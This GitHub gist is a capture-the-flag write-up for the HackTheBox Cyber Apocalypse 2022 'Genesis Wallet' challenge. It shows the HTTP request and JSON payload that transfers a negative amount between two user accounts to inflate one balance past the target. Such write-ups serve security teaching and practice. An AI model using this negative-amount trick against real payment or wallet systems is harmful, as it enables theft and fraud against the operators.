Skip to content

Instantly share code, notes, and snippets.

@pich4ya
Created May 19, 2022 13:27
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save pich4ya/0db024271327c6abc3a96b986d2c781a to your computer and use it in GitHub Desktop.
Save pich4ya/0db024271327c6abc3a96b986d2c781a to your computer and use it in GitHub Desktop.
HackTheBox Cyber Apocalypse 2022 Intergalactic Chase - Genesis Wallet Writeup
# author Pichaya Morimoto (p.morimoto@sth.sh)
Unintened solution.
You create 2 users. Then, do transfer -9999 amount from one account to another.
POST /api/transactions/create HTTP/1.1
[...]
Content-Length: 84
{"amount": "-9999", "note": "asd", "receiver": "c8b07fa9e1a8f821bef8678c30641774"}
0.1 - (-9999) = 9999.1
Then, you have more money than 1337 !
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment